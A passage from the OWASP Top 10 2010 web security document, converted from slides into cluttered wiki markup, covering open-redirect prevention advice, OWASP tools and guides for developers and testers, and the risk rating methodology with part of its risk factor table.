* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html#sendRedirect(java.lang.String) ESAPI ]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html#sendRedirect(java.lang.String) SecurityWrapperResponse]</span><span class="T11">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html#sendRedirect(java.lang.String)  sendRedirect() method]</span><span class="odfLiEnd"> </span>
 
 
<span class="T11"></span>
 
 
<span class="T19">External</span>
 
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://cwe.mitre.org/data/definitions/601.html CWE Entry 601 on Open Redirects ]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://projects.webappsec.org/URL-Redirector-Abuse WASC Article on URL Redirector Abuse]</span><span class="odfLiEnd"> </span>
 
* <span style="display: block; float: left; min-width: 0cm">•</span><span class="T8"> </span><span class="T11">[http://googlewebmastercentral.blogspot.com/2009/01/open-redirect-urls-is-your-site-being.html Google blog article on the dangers of open redirects]</span><span class="odfLiEnd"> </span>
 
 
<span class="T11"></span>
 
 
<span class="T15"><br /></span><span class="T15">How Do I Prevent This?</span>
 
 
<span class="T8">Safe use of redirects and forwards can be done in a number of ways:</span>
 
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">Simply avoid using redirects and forwards.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">If used, don’t involve user parameters in calculating the destination. This can usually be done.</span><span class="odfLiEnd"> </span>
 
# <span style="display: block; float: left; min-width: 0.634cm">●.</span><span class="T8">If destination parameters can’t be avoided, ensure that the supplied value is </span><span class="T10">valid</span><span class="T8">, and </span><span class="T10">authorized </span><span class="T8">for the user.</span><span class="odfLiEnd"> </span>
 
 
<span class="T8"><span style="margin-left:"></span><span class="T8">It is recommended that such destination parameters be a mapping value, rather than the actual URL or portion of the URL, and that server side code translate this mapping to the target URL.</span></span>
 
 
<span class="T8"><span style="margin-left:"></span><span class="T8">Applications can use ESAPI to override the </span><span class="T8">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html#sendRedirect(java.lang.String) sendRedirect]</span><span class="T8">[http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/filters/SecurityWrapperResponse.html#sendRedirect(java.lang.String) ()]</span><span class="T8"> method to make sure all redirect destinations are safe.</span></span>
 
 
<span class="T8">Avoiding such flaws is extremely important as they are a favorite target of phishers trying to gain the user’s trust.</span>
 
 
<div id="Title_25" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">Unvalidated Redirects and Forwards</span>
 
 
</div></div><div id="Text_Placeholder_26" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">A10</span><span class="odfLiEnd"> </span>
 
 
</div></div>
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">16</span></span><span class="T4"><span title="page-number">16</span></span>
 
 
</div></div></div><div id="page17" class="dp3"><div id="Table_6" style="height: 22.009cm; width: 19.049cm">
 
 
{|
 
|- class="ro3"
 
| class="ce173" style="text-align: left; width: 19.05cm" |
 
<span class="T35">Establish and Use a Full Set of Common Security Control s</span>
 
|- class="ro25"
 
| class="ce174" style="text-align: left; width: 19.05cm" |
 
<span class="T8">Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this can be daunting.</span>
 
 
<span class="T8"></span>
 
 
<span class="T10">Many Free and Open OWASP Resources Are Available</span>
 
 
<span class="T10"></span>
 
 
<span class="T8">To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous </span><span class="T11">free and open</span><span class="T8"> resources that you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications.</span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
 
<span class="T8">There are numerous additional OWASP resources available for your use. Please visit the </span><span class="T8">[http://www.owasp.org/index.php/Projects OWASP Projects page]</span><span class="T8">, which lists all of the OWASP projects, organized by the release quality of the projects in question (Release Quality, Beta, or Alpha). Most OWASP resources are available on our </span><span class="T8">[http://www.owasp.org/ wiki]</span><span class="T8">, and many OWASP documents can be ordered in </span><span class="T8">[http://stores.lulu.com/owasp hardcopy]</span><span class="T8">.</span>
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Title_9" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">What’s Next for Developers</span>
 
 
</div></div><div id="Text_Placeholder_10" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">+D</span><span class="odfLiEnd"> </span>
 
 
</div></div><div id="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{39F11DF5-92F1-4803-9176-8CE41A00F711}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{5CF86F3C-C725-40E9-9BD5-DEF8085DEA2E}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{35005AD2-355F-4221-AFBE-62EE5EE8EED6}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
[[Image:.]]
 
 
</div><div id="{DB4CDFA1-2818-4A44-954F-EB22B78FAC9C}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{E9B37935-A190-492F-89CA-C506985D7367}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{88BEC42B-0235-4112-AA8D-C1D1764EF8E1}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{41C02D83-CEEC-4620-A615-8B5A4D00B738}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{E3D14D2D-CB9A-4BA6-A4F0-30D73ED14363}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="{0527E629-D6A1-4D08-92A0-442047772A1B}" class="P8" style="height: 4.656cm; width: 4.867cm">
 
 
[[Image:.]]
 
 
</div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">17</span></span><span class="T4"><span title="page-number">17</span></span>
 
 
</div></div></div><div id="page18" class="dp3"><div id="Table_8" style="height: 10.557cm; width: 19.049cm">
 
 
{|
 
|- class="ro3"
 
| class="ce175" style="text-align: left; width: 19.05cm" |
 
<span class="T35">Get Organized</span>
 
|- class="ro26"
 
| class="ce176" style="text-align: left; width: 19.05cm" |
 
<span class="T8">To verify the security of a web application you have developed, or one you are considering purchasing, OWASP recommends that you review the application’s code (if available), and test the application as well. OWASP recommends a combination of security code review and application penetration testing whenever possible, as that allows you to leverage the strengths of both techniques, and the two approaches complement each other. Tools for assisting the verification process can improve the efficiency and effectiveness of an expert analyst. OWASP’s assessment tools are focused on helping an expert become more effective, rather than trying to automate the analysis process itself. </span>
 
 
<span class="T8"></span>
 
 
<span class="T12">Standardizing How You Verify Web Application Security: </span><span class="T8">To help organizations develop consistency and a defined level of rigor when assessing the security of web applications, OWASP has produced the OWASP </span><span class="T8">[http://www.owasp.org/index.php/ASVS Application Security Verification Standard (ASVS)]</span><span class="T8">. This document defines a minimum verification standard for performing web application security assessments. OWASP recommends that you use the ASVS as guidance for not only what to look for when verifying the security of a web application, but which techniques are most appropriate to use, and to help you define and select a level of rigor when verifying the security of a web application. OWASP also recommends you use the ASVS to help define and select any web application assessment services you might procure from a third party provider.</span>
 
 
<span class="T8"></span>
 
 
<span class="T12">Assessment Tools Suite:</span><span class="T8"> The </span><span class="T8">[http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project OWASP Live CD Project]</span><span class="T8"> has pulled together some of the best open source security tools into a single bootable environment. Web developers, testers, and security professionals can boot from this Live CD and immediately have access to a full security testing suite. No installation or configuration is required to use the tools provided on this CD.</span>
 
 
<span class="T8"></span>
 
 
<span class="T8"></span>
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Title_5" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">What’s Next for Verifiers</span>
 
 
</div></div><div id="Text_Placeholder_6" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">+V</span><span class="odfLiEnd"> </span>
 
 
</div></div><div id="Table_9" style="height: 12.275cm; width: 9.524cm">
 
 
{|
 
|- class="ro3"
 
| class="ce177" style="text-align: left; width: 9.525cm" |
 
<span class="T35">Code Review</span>
 
|- class="ro27"
 
| class="ce178" style="text-align: left; width: 9.525cm" |
 
<span class="T8">Reviewing the code is the strongest way to verify whether an application is secure. Testing can only prove that an application is insecure.</span>
 
 
<span class="T8"></span>
 
 
<span class="T12">Reviewing the Code: </span><span class="T8">As a companion to the </span><span class="T8">[http://www.owasp.org/index.php/Guide OWASP Developer’s Guide]</span><span class="T8">, and the </span><span class="T8">[http://www.owasp.org/index.php/Testing_Guide OWASP Testing Guide]</span><span class="T8">, OWASP has produced the </span><span class="T8">[http://www.owasp.org/index.php/Code_Review_Guide OWASP Code Review Guide]</span><span class="T8"> to help developers and application security specialists understand how to efficiently and effectively review a web application for security by reviewing the code. There are numerous web application security issues, such as Injection Flaws, that are far easier to find through code review, than external testing.</span>
 
 
<span class="T8"></span>
 
 
<span class="T12">Code Review Tools: </span><span class="T8">OWASP has been doing some promising work in the area of assisting experts in performing code analysis, but these tools are still in their early stages. The authors of these tools use them every day when performing their security code reviews, but non-experts may find these tools a bit difficult to use. These include </span><span class="T8">[http://www.owasp.org/index.php/Category:OWASP_Code_Crawler CodeCrawler]</span><span class="T8">, </span><span class="T8">[http://www.owasp.org/index.php/Category:OWASP_Orizon_Project Orizon]</span><span class="T8">, and </span><span class="T8">[http://www.owasp.org/index.php/OWASP_O2_Platform O2]</span><span class="T8">.</span>
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Table_10" style="height: 13.04cm; width: 9.312cm">
 
 
{|
 
|- class="ro11"
 
| class="ce179" style="text-align: left; width: 9.313cm" |
 
<span class="T35">Security and Penetration Testing</span>
 
|- class="ro28"
 
| class="ce180" style="text-align: left; width: 9.313cm" |
 
<span class="T12">Testing the Application: </span><span class="T8">OWASP produced the </span><span class="T8">[http://www.owasp.org/index.php/Testing_Guide Testing Guide]</span><span class="T8"> to help developers, testers, and application security specialists understand how to efficiently and effectively test the security of web applications. This enormous guide, which had dozens of contributors, provides wide coverage on many web application security testing topics. Just as code review has its strengths, so does security testing. It’s very compelling when you can prove that an application is insecure by demonstrating the exploit. There are also many security issues, particularly all the security provided by the application infrastructure, that simply cannot be seen by a code review, since the application is not providing the security itself. </span>
 
 
<span class="T8"></span>
 
 
<span class="T12">Application Penetration Testing Tools: </span><span class="T8">[http://www.owasp.org/index.php/WebScarab WebScarab]</span><span class="T8">, which is one of the most widely used of all OWASP projects, is a web application testing proxy. It allows a security analyst to intercept web application requests, so the analyst can figure out how the application works, and then allows the analyst to submit test requests to see if the application responds securely to such requests. This tool is particularly effective at assisting an analyst in identifying XSS flaws, Authentication flaws, and Access Control flaws.</span>
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">18</span></span><span class="T4"><span title="page-number">18</span></span>
 
 
</div></div></div><div id="page19" class="dp3"><div id="Table_8" style="height: 22.223cm; width: 19.049cm">
 
 
{|
 
|- class="ro3"
 
| class="ce181" style="text-align: left; width: 19.05cm" |
 
<span class="T35">Start Your Application Security Program Now</span>
 
|- class="ro29"
 
| class="ce182" style="text-align: left; width: 19.05cm" |
 
<span class="T8">Application security is no longer a choice. Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications. Given the staggering number of applications and lines of code already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.  OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio.  Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture.  It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner.  Some of the key activities in effective application security programs include:</span>
 
 
<span class="T8"></span>
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Title_5" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">What’s Next for Organizations</span>
 
 
</div></div><div id="Text_Placeholder_6" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">+O</span><span class="odfLiEnd"> </span>
 
 
</div></div><div id="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
[[Image:.]]
 
 
</div><div id="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{F576BD5F-AD4E-429F-935A-1A67C630AE0F}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{BDF0D463-07CB-4904-B045-2FC63D99B581}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
[[Image:.]]
 
 
</div><div id="{024BBBE2-0706-4354-8AB0-3262009E8862}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
[[Image:.]]
 
 
</div><div id="{C40210B5-480D-4766-978A-36F3F23CB9B8}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{0945CDD4-9E6A-4629-B151-EFF4819549CB}" class="P8" style="height: 0.001cm; width: 0.001cm">
 
 
[[Image:.]]
 
 
</div><div id="{29D76988-94EC-456A-9326-82A5AA778D9E}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="{168F1251-0689-442A-B8FC-0A781112776D}" class="P8" style="height: 5.643cm; width: 4.021cm">
 
 
[[Image:.]]
 
 
</div><div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">19</span></span><span class="T4"><span title="page-number">19</span></span>
 
 
</div></div></div><div id="page20" class="dp3"><div id="Table_6" style="height: 22.223cm; width: 19.049cm">
 
 
{|
 
|- class="ro3"
 
| class="ce183" style="text-align: left; width: 19.05cm" |
 
<span class="T7">It’s About Risks, Not Weaknesses</span>
 
|- class="ro29"
 
| class="ce184" style="text-align: left; width: 19.05cm" |
 
<span class="T8">Although </span><span class="T8">[http://www.owasp.org/index.php/Top_10_2007 previous versions of the OWASP Top 10]</span><span class="T8"> focused on identifying the most common “vulnerabilities,” these documents have actually always been organized around risks. This caused some understandable confusion on the part of people searching for an airtight weakness taxonomy. This update clarifies the risk-focus in the Top 10 by being more explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks.</span>
 
 
<span class="T8"></span>
 
 
<span class="T8">To do so, we developed a Risk Rating methodology for the Top 10 that is based on the </span><span class="T8">[http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology OWASP Risk Rating Methodology]</span><span class="T8">. For each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application.</span>
 
 
<span class="T8"></span>
 
 
<span class="T8">The </span><span class="T8">[http://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology OWASP Risk Rating Methodology]</span><span class="T8"> defines numerous factors to help calculate the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications. As such, we can never be as precise as a system owner can when calculating risk in their applications. We don’t know how important your applications and data are, what your threat agents are, nor how your system has been built and is being operated.</span>
 
 
<span class="T8"></span>
 
 
<span class="T8">Our methodology includes three likelihood factors for each weakness (prevalence, detectability, and ease of exploit) and one impact factor (technical impact). The prevalence of a weakness is a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. This was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top 10.</span>
 
 
<span class="T8"></span>
 
 
<span class="T8">Note that this approach does not take the likelihood of the threat agent into account. Nor does it account for any of the various technical details associated with your particular application. Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability. This rating also does not take into account the actual impact on your business. </span><span class="T11">Your organization</span><span class="T8"> will have to decide how much security risk from applications </span><span class="T11">the organization</span><span class="T8"> is willing to accept. The purpose of the OWASP Top 10 is not to do this risk analysis for you.</span>
 
 
<span class="T8"></span>
 
 
<span class="T8">The following illustrates our calculation of the risk for A2: Cross-Site Scripting, as an example. Note that XSS is so prevalent that it warranted the only ‘VERY WIDESPREAD’ prevalence value. All other risks ranged from widespread to uncommon (values 1 to 3).</span>
 
 
<span class="T8"></span>
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Title_9" class="P5" style="height: 2.368cm; width: 15.239cm"><div>
 
 
<span class="T5">Notes About Risk</span>
 
 
</div></div><div id="Text_Placeholder_12" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">+R</span><span class="odfLiEnd"> </span>
 
 
</div></div><div id="Table_4" style="height: 9.435cm; width: 18.413cm">
 
 
{|
 
|- class="ro17"
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro19"
 
| class="ce185" style="text-align: left; width: 3.069cm" |
 
<span class="T12">__________</span>
 
| class="ce186" style="text-align: left; width: 3.069cm" |
 
<span class="T12">Exploitability</span>
 
 
<span class="T12">AVERAGE</span>
 
| class="ce187" style="text-align: left; width: 3.069cm" |
 
<span class="T12">Prevalence</span>
 
 
<span class="T12">VERY WIDESPREAD</span>
 
| class="ce188" style="text-align: left; width: 3.069cm" |
 
<span class="T12">Detectability</span>
 
 
<span class="T12">EASY</span>
 
| class="ce189" style="text-align: left; width: 3.069cm" |
 
<span class="T12">Impact</span>
 
 
<span class="T12">MODERATE</span>
 
| class="ce190" style="text-align: left; width: 3.069cm" |
 
<span class="T12">__________</span>
 
|- class="ro30"
 
| class="ce191" style="text-align: left; width: 3.069cm" |
 
| class="ce192" style="text-align: left; width: 3.069cm" |
 
<span class="T40">2</span>
 
| class="ce193" style="text-align: left; width: 3.069cm" |
 
<span class="T40">0</span>
 
 
<span class="T40"></span>
 
 
<span class="T40"></span>
 
 
<span class="T40">1</span>
 
| class="ce194" style="text-align: left; width: 3.069cm" |
 
<span class="T40">1</span>
 
 
<span class="T40"></span>
 
 
<span class="T40"></span>
 
 
<span class="T40"><nowiki>*</nowiki></span>
 
| class="ce195" style="text-align: left; width: 3.069cm" |
 
<span class="T40">2</span>
 
 
<span class="T40"></span>
 
 
<span class="T40"></span>
 
 
<span class="T40">2</span>
 
| class="ce196" style="text-align: left; width: 3.069cm" |
 
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Picture_2" class="P8" style="height: 1.692cm; width: 6.45cm">
 
 
[[Image:./]]
 
 
</div><div id="Picture_2" class="P8" style="height: 1.692cm; width: 6.45cm">
 
 
[[Image:./]]
 
 
</div>
 
 
<span class="T40">2</span>
 
 
<span class="T27">          </span><span class="T27">Security</span><span class="T27"><br /></span><span class="T27">          Weakness</span>
 
 
<span class="T27">    </span><span class="T27">Attack</span>
 
 
<span class="T27">    </span><span class="T27">Vectors</span>
 
 
<span class="T27"> </span><span class="T27">Technical</span><span class="T27"><br /></span><span class="T27">  Impacts</span>
 
 
<span class="T28">Threat</span><span class="T28"><br /></span><span class="T28">Agents</span>
 
 
<span class="T27">Business</span><span class="T27"><br /></span><span class="T27">Impacts</span>
 
 
<div id="Notes_Placeholder_2" class="P5" style="height: 0.001cm; width: 0.001cm"><div>
 
 
</div></div><div id="Slide_Number_Placeholder_3" class="P4" style="height: 0.001cm; width: 0.001cm"><div>
 
 
<span class="T4"><span title="page-number">20</span></span><span class="T4"><span title="page-number">20</span></span>
 
 
</div></div></div><div id="page21" class="dp3"><div id="Table_33" style="height: 4.491cm; width: 19.049cm">
 
 
{|
 
|- class="ro31"
 
| class="ce197" style="text-align: left; width: 19.05cm" |
 
<span class="T7">Top 10 Risk Factor Summary</span>
 
|- class="ro32"
 
| class="ce198" style="text-align: left; width: 19.05cm" |
 
<span class="T8"><br /></span><span class="T8">The following table presents a summary of the 2010 Top 10 Application Security Risks, and the risk factors we have assigned to each  risk. These factors were determined based on the available statistics on the experience of the OWASP team. To understand these risks for a particular application or organization, </span><span class="T41">you must consider your own specific threat agents and business impacts</span><span class="T8">. Even egregious software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</span>
 
|}
 
 
[[Image:./]]
 
 
</div><div id="Title_62" class="P5" style="height: 2.116cm; width: 15.239cm"><div>
 
 
<span class="T5">Details About Risk Factors</span>
 
 
</div></div><div id="Text_Placeholder_64" class="P5" style="height: 2.307cm; width: 3.597cm"><div>
 
 
* <span style="display: block; float: left; min-width: 0.952cm">•</span><span class="T6">+F</span><span class="odfLiEnd"> </span>
 
 
</div></div><div id="Table_67" style="height: 13.518cm; width: 19.048cm">
 
 
{|
 
|- class="ro17"
 
| class="ce199" style="text-align: left; width: 2.751cm" |
 
<span class="T7">RISK</span>
 
| style="text-align: left" |
 
| style="text-align: left" |
 
| style="text-align: left" colspan="2" |
 
| style="text-align: left" |
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce200" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A1-Injection</span>
 
| style="text-align: left" |
 
| class="ce202" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce203" style="text-align: left; width: 3.159cm" |
 
<span class="T12">COMMON</span>
 
| class="ce204" style="text-align: left; width: 2.949cm" |
 
<span class="T12">AVERAGE</span>
 
| class="ce205" style="text-align: left; width: 2.949cm" |
 
<span class="T12">SEVERE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce206" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A2-XSS</span>
 
| style="text-align: left" |
 
| class="ce207" style="text-align: left; width: 2.949cm" |
 
<span class="T12">AVERAGE</span>
 
| class="ce208" style="text-align: left; width: 3.159cm" |
 
<span class="T12">VERY WIDESPREAD</span>
 
| class="ce209" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce210" style="text-align: left; width: 2.949cm" |
 
<span class="T12">MODERATE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce211" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A3-Auth’n</span>
 
| style="text-align: left" |
 
| class="ce212" style="text-align: left; width: 2.949cm" |
 
<span class="T12">AVERAGE</span>
 
| class="ce213" style="text-align: left; width: 3.159cm" |
 
<span class="T12">COMMON</span>
 
| class="ce214" style="text-align: left; width: 2.949cm" |
 
<span class="T12">AVERAGE</span>
 
| class="ce215" style="text-align: left; width: 2.949cm" |
 
<span class="T12">SEVERE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce216" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A4-DOR</span>
 
| style="text-align: left" |
 
| class="ce217" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce218" style="text-align: left; width: 3.159cm" |
 
<span class="T12">COMMON</span>
 
| class="ce219" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce220" style="text-align: left; width: 2.949cm" |
 
<span class="T12">MODERATE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce221" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A5-CSRF</span>
 
| style="text-align: left" |
 
| class="ce222" style="text-align: left; width: 2.949cm" |
 
<span class="T12">AVERAGE</span>
 
| class="ce223" style="text-align: left; width: 3.159cm" |
 
<span class="T12">WIDESPREAD</span>
 
| class="ce224" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce225" style="text-align: left; width: 2.949cm" |
 
<span class="T12">MODERATE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce226" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A6-Config</span>
 
| style="text-align: left" |
 
| class="ce227" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce228" style="text-align: left; width: 3.159cm" |
 
<span class="T12">COMMON</span>
 
| class="ce229" style="text-align: left; width: 2.949cm" |
 
<span class="T12">EASY</span>
 
| class="ce230" style="text-align: left; width: 2.949cm" |
 
<span class="T12">MODERATE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce231" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A7-Crypto</span>
 
| style="text-align: left" |
 
| class="ce232" style="text-align: left; width: 2.949cm" |
 
<span class="T12">DIFFICULT</span>
 
| class="ce233" style="text-align: left; width: 3.159cm" |
 
<span class="T12">UNCOMMON</span>
 
| class="ce234" style="text-align: left; width: 2.949cm" |
 
<span class="T12">DIFFICULT</span>
 
| class="ce235" style="text-align: left; width: 2.949cm" |
 
<span class="T12">SEVERE</span>
 
| style="text-align: left" |
 
|- class="ro17"
 
| class="ce236" style="text-align: left; width: 2.751cm" |
 
<span class="T12">A8-URL Access</span>
 
| style="text-align: left" |
 
